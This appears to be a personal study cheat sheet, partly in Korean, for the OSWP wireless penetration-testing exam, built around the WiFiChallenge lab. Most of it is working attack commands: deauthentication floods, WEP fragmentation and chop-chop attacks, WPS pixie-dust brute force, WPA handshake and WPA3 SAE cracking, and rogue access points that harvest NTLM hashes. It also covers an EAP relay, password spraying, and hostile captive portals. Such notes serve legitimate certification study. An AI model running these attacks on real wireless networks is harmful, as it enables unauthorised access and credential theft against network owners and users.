g3rm
Info
Exam
https://lab.wifichallenge.com/
Resource
https://www.offsec.com/courses/pen-210/ https://lab.wifichallenge.com/ https://pierrelouis.blog/posts/oswp-lab-setup/ https://zeyadazima.com/certificates/oswprg/ https://youtu.be/Ra0dGPYScLQ?si=KMNJr7d0PbI08b8Y
Setting
https://github.com/r4ulcl/WiFiChallengeLab-docker
git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose --file docker-compose.yml up -d
Basic
Settings
# 드라이버 확인
sudo airmon-ng
# USB 장치 나열
sudo lsusb -vv
# 종속성, 호환성 및 펌웨어 요구사항 확인
sudo modinfo ath9k_htc
# 로드된 모듈과 각 모듈의 종속성 나열
lsmod
# 모듈 제거 - 종속되어 있는 거 모두 나열
sudo rmmod <module_name1> <module_name2>
sudo airmon-ng check kill
# Check available interfaces
iwconfig
# Start and stop
sudo airmon-ng start wlan0
sudo airmon-ng stop wlan0mon
# chennel 변경
sudo iwconfig [monitor_interface] channel [number]
# MAC 변경
systemctl stop network-manager
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
Wireless Tools
iw util
# 사용 가능한 채널/주파수 표시
sudo iwlist wlan0 frequency
# 더 자세히 표시
sudo iw list
# 채널 설정
sudo iwconfig wlan0mon channel 11
# 사용 가능한 SSID 나열
sudo iw dev wlan0 scan | grep SSID
# iw 스캔 출력 구문 분석을 통해 사용 가능한 SSID 및 채널 나열
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
# 새 가상 인터페이스(VIF) wlan0mon를 생성 및 활성화 및 제거
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
sudo iw dev wlan0mon interface del
# 덤프
sudo tcpdump -i wlan0mon
# 규제 확인 country 00
sudo iw reg get
# 규제 도메인 변경 및 설정 / 영구 변경은 /etc/default/crda에서 REGDOMAIN=US 처럼 입력
iw reg set <COUNTRY>
rfkill
rfkill은 연결된 무선 기기를 활성화 또는 비활성화하는 도구
# 활성화된 모든 Wi-Fi 및 Bluetooth 장치를 표시
sudo rfkill list
#무선 통신을 비활성화 및 재활성화
sudo rfkill block all
sudo rfkill block <block_id>
sudo rfkill unblock <block_id>
Monitor
–band abg: Scan for networks on 2.4GHz (b and g) and 5GHz (a) bands. -c: network channel –manufacturer: Display the manufacturer of detected access points. –wps: Display information about WPS. -w output: Write the output to a file named output.
# dump
sudo airodump-ng [monitor_interface] --band abg --manufacturer --wps --bssid [BSSID] -c [channel] -w [output_file]
sudo airodump-ng wlan0mon -w ~/wifi/scan --manufacturer --wps --band abg -c11 --bssid 00:00:00:00:00:00
# AP-mac을 통한 ssid 유추
mdk4 wlan0mon p -t [BSSID] -f [wordlist]
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f ~/wifi-rockyou.txt
# wifi-db
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE
Decrypt
# decap : psk 패킷 해독
airdecap-ng -e wifi-mobile -p $PASSWORD ~/wifi/scanc6-02.cap
wireshark ~/wifi/scanc6-02-dec.cap
Connect
conf files정리된 곳
# wpa_supplicant 사용 전 충돌 방지 필수
sudo systemctl stop NetworkManager
sudo systemctl disable NetworkManager
# network 연결 및 IP 할당 받기 및 IP 얻기
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
dhclient wlan2 -v
arp-scan -I wlan2 -l
# IP 할당 해제
dhclient wlan2 -r
Open
network={
ssid="Open_Network_Name"
key_mgmt=NONE
}
network={
ssid="[ESSID]"
scan_ssid=1
mode=0
auth_alg=OPEN
key_mgmt=NONE
}
WEP
network={
ssid="SSID"
key_mgmt=NONE
wep_key0=""
wep_tx_keyidx=0
}
network={
ssid="[ESSID]"
scan_ssid=1
mode=0
auth_alg=OPEN
key_mgmt=NONE
wep_key0=0304050607
}
PSK
network={
ssid="[ESSID]"
key_mgmt=WPA_PSK
psk="[passphrase]"
proto=WPA
pairwise=CCMP
group=CCMP
}
network={
ssid="wifi-mobile"
psk="$PASSWORD"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}
SAE
network={
# Connect via WPA3 to a WPA2+WPA3 network
ssid="my_network"
psk="password"
key_mgmt=SAE
ieee80211w=1
}
EAP
eap, phase2_auth는 가변으로 알맞게 설정하면 된다.
PEAP-MSCHAPv2, PEAP-GTC, TTLS-PAP, TTLS-CHAP, TTLS-MSCHAPv2
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
## so add your rogue BSSID here.
bssid_blacklist=F0:9F:C2:00:00:00
}
WEP
With Client
# auto
besside-ng -c 1 -b F0:9F:C2:AA:19:29 wlan2 -v
# manual [airodump -> aireplay -> aircrack]
sudo airodump-ng -w [pcap_file_name] --band abg --bssid [mac] -c [channel] wlan0mon
sudo aireplay-ng -1 0 -a [BSSID] -h [Interface_Mac] -e "ESSID" [Interface]
sudo aireplay-ng -3 -b [BSSID] -h [interface_mac_address] [monitor_interface]
sudo aircrack-ng [pcap_file_name].cap
# if not crack
aircrack-ng -w [PASSWORDS_WORDLIST] [pcap_file_name].cap
Without Client
# Fragmentation Attack
airodump-ng -w [CAPTURE_NAME] -c [CHANNEL] --bssid [BSSID] [INTERFACE]
macchanger --show [INTERFACE]
aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [YOUR_MAC] [INTERFACE]
aireplay-ng -5 -b [BSSID] -h [YOUR_MAC] [INTERFACE]
packetforge-ng -0 -a [BSSID] -h [YOUR_MAC] -k 255.255.255.255 -l 255.255.255.255 -y [FRAGMENT_PACKET].xor -w [ARP_PACKET_NAME]
aireplay-ng -2 -r [ARP_PACKET_NAME] [INTERFACE]
aircrack-ng [CAPTURE_NAME]
# Chop Chop Attack - 위에서 -5를 -4로만 하면 됨
aireplay-ng -4 -b [BSSID] -h [YOUR_MAC] [INTERFACE]
WEB-SKA
나중에 할 일 생기면 알아서 찾아보자
WPA, WPA2 & WPA3
# 연결된 client가 없을 경우
# Deauthentication broadcast attack
aireplay-ng -0 1 -a [BSSID] [INTERFACE]
WPS
# Identifying access points with WPS enabled
wash -i <INTERFACE> -s
# Get your MAC address
macchanger --show <INTERFACE>
# Fake authentication attack
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
# Offline brute force (pixie dust)
reaver -i wlan0 -b 00:06:91:DE:B1:30 -SNLAvv -c 1 -K
# Online brute force
reaver -i <INTERFACE> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>
PSK
# 패스워드 얻는 부류 -> 인증해제 공격 -> 패킷 덤프 -> aircrack
sudo airodump-ng -w [pcap_file_name] --band abg --bssid [mac] -c [channel] wlan0mon
# wait re handshake (client-mac 없어도 됨)
sudo aireplay-ng -0 5 -c [client-mac] -a [BSSID] [interface_in_monitor_mode]
sudo aircrack-ng -w [wordlist] [pcap_file_name].cap
SAE
# brute force
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462
# downgrade
## [in wireshark pcap] Wireless Management -> RSN Information -> Management Frame Protection Required, Capable의 False 확인 시 인증 해제 가능
## hostapd.conf
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
hostapd-mana hostapd.conf
aireplay-ng [INTERFACE] -0 0 -a [BSSID] -c [CLIENT_MAC]
## If the original is hostapd.hccapx (text):
sed 's/^\[WPA2-EAPOL HASHCAT\][[:space:]]*//' hostapd.hccapx > clean_hashes.txt
hashcat -a 0 -m 2500 clean_hashes.txt ~/rockyou-top100000.txt
WPA Enterprise
Get User Domain
# In Wireshark filter for "eap", then search the "Response, Identity" packets, and then in the section "Extensible Authentication Protocol"
wireshark [SAVED_FILE].cap
# wifi-db 사용
# tshark
tshark -r [SAVED_FILE].cap -Y '(eap && wlan.ra == [BSSID]) && (eap.identity)' -T fields -e eap.identity
Get Server Certificate Email
# In Wireshark use the filter:
(wlan.sa == [BSSID]) && (tls.handshake.certificate)
# pcapFilter
bash pcapFilter.sh -f [SAVED_FILE].cap -C
# tshark
tshark -r [SAVED_FILE].cap -Y "wlan.bssid == [BSSID] && ssl.handshake.type == 11" -V
## (Optional) If we only want to get the IA5String info
tshark -r [SAVED_FILE].cap -Y "wlan.bssid == [BSSID] && x509sat.IA5String" -T fields -e x509sat.IA5String
Get EAP Supported
bash ./EAP_buster.sh [SSID] '[DOMAIN]\[USER]' [INTERFACE]
bash ./EAP_buster.sh wifi-global 'GLOBAL\GlobalAdmin' wlan1
Rogue AP
hostmana
OSWP 합격 보고서 참고
NTLM dump
# 인증서 설치
cd /root/tools/eaphammer
python3 ./eaphammer --cert-wizard
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced
# 기존 모든 AP에 연결해제 공격 -> Rogue AP에 붙도록 유도
iwconfig wlan0mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon -c 64:32:A8:07:6C:40
airmon-ng start wlan1
iwconfig wlan1mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan1mon -c 64:32:A8:07:6C:40
# 해시 크랙 / bulldogs1234
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou-top100000.txt --force
Relay
# mac변경
airmon-ng stop wlan1mon
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
# Shell 1 : Rogue AP
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets
# Shell 2 : 인증 해제
airmon-ng start wlan0
iwconfig wlan0mon channel 44
aireplay-ng -0 0 wlan0mon -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55
# Shell 3
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3
# Brute Force
cd ~/tools/air-hammer
echo 'CONTOSO\test' > test.user
./air-hammer.py -i wlan3 -e wifi-corp -p ~/rockyou-top100000.txt -u test.user
# Password Relay
cat ~/top-usernames-shortlist.txt | awk '{print "CONTOSO\\" $1}' > ~/top-usernames-shortlist-contoso.txt
./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u ~/top-usernames-shortlist-contoso.txt
Captive & Responder
./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal
./eaphammer --essid WiFi-Restaurant --interface wlan2 --hostile-portal
WireShark
Local Capture
# Wi-Fi 어댑터를 모니터 모드로 설정
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
# channel hop & quickly scan all channels on 2.4GHz
for channel in 1 6 11 2 7 10 3 8 4 9 5
do
iw dev wlan0mon set channel ${channel}
sleep 1
done
## channel hop 2
sudo airodump-ng wlan0mon
# all interface
sudo wireshark -D
# interface capture start & Monitor Mode & filter
sudo wireshark -i <interface> -k -I -f "<filter>" -s <byte length>
# pcap open
wireshark file.pcap
Remote Capture
sudo tcpdump -U -w - -i wlan0mon | wireshark -k -i -
Filtter
# 0, 1, 2, 3 -> 관리, 제어, 데이터, 확장 프레임
wlan.fc.type==2
!(wlan.fc.type == 1)
# 장치 필터링 & 비콘 & 프로브(요청 및 응답) & 연관성(요청 및 응답) & 데이터
((wlan addr1 3A:30:F9:0F:E1:95) or (wlan addr2 3A:30:F9:0F:E1:95) or (wlan addr3 3A:30:F9:0F:E1:95) or (wlan addr4 3A:30:F9:0F:E1:95)) and not (subtype beacon) and not (type ctl) and not (subtype probe-req) and not (subtype probe-resp)